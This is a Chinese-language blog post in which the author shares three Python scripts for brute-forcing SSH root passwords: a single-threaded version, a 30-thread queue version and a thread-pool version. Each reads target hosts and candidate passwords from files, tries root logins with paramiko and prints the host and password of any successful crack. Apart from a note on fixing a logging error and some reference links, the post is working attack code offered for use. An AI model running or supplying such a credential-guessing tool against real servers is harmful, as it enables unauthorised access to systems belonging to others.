ssh爆破脚本
前些天,基友发我一个ssh爆破工具,看起来很吊的样子。然后我就无聊自己写了个py脚本的。
单线程:慢成狗-----
#coding:utf-8 #author:jwong import threading import os import time import paramiko import sys import Queue import socket BASE_DIR = os.path.dirname(os.path.abspath(__file__)) def ssh_connect(host,pwd): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(hostname=host,port=22,username='root',password=pwd,timeout=5) ssh.close() print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host) except paramiko.AuthenticationException,e: pass except socket.error,e: pass # class ClassName(object): # """docstring for ClassName""" # def __init__(self, arg): # super(ClassName, self).__init__() # self.arg = arg # host_file = BASE_DIR + '\dict\hosts.txt' pass_file = BASE_DIR + '\dict\pass.txt' def open_file(path): host = [] with open(path,'r') as f: for line in f.readlines(): if line.strip('\n') == '': continue host.append(line.strip('\n')) return host hosts = open_file(host_file) password = open_file(pass_file) for host in hosts: for pass12 in password: print host ssh_connect(host,pass12)
运行会出现:No handlers could be found for logger "paramiko.transport" 错误 ----http://stackoverflow.com/questions/19152578/no-handlers-could-be-found-for-logger-paramiko
多线程版本:
#coding:utf-8 import threading import Queue import paramiko import socket import os BASE_DIR = os.path.dirname(os.path.abspath(__file__)) host_file = BASE_DIR + '\dict\hosts.txt' pass_file = BASE_DIR + '\dict\pass.txt' paramiko.util.log_to_file("filename.log") queue = Queue.Queue() lock = threading.Lock() def read_host_file(path): hostlist = [] with open(path,'r') as f: for line in f.readlines(): if line == '': continue line = socket.gethostbyname(line.strip()) hostlist.append(line) return hostlist def read_pass_file(path): passlist = [] with open(path,'r') as f: for line in f.readlines(): if line == '': continue passlist.append(line.strip()) return passlist class SSH(threading.Thread): """docstring for SSH""" def __init__(self,queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: # if self.queue.empty(): # break host,pwd = self.queue.get() try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname=host,port=22,username='root',password=pwd,timeout=5) ssh.close() print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host) except paramiko.AuthenticationException,e: pass except socket.error,e: pass except: pass self.queue.task_done() if __name__ == '__main__': hosts = read_host_file(host_file) passlist = read_pass_file(pass_file) for i in range(30): fuck_ssh = SSH(queue) fuck_ssh.setDaemon(True) fuck_ssh.start() for host in hosts: for pwd in passlist: queue.put((host,pwd)) queue.join()
另一个模块实现:
#coding:utf-8 from multiprocessing.dummy import Pool as ThreadPool from functools import partial if __name__ == '__main__': hosts = read_host_file(host_file) passlist = read_pass_file(pass_file) for host in hosts: partial_user = partial(ssh_connect,host) pool = ThreadPool(20) pool.map(partial_user,passlist) pool.close() pool.join()
参考文献:
http://www.ibm.com/developerworks/cn/aix/library/au-threadingpython/
http://www.waitalone.cn/python-mysql-mult.html
http://www.waitalone.cn/python-brute-all.html
http://www.waitalone.cn/python-thread-map.html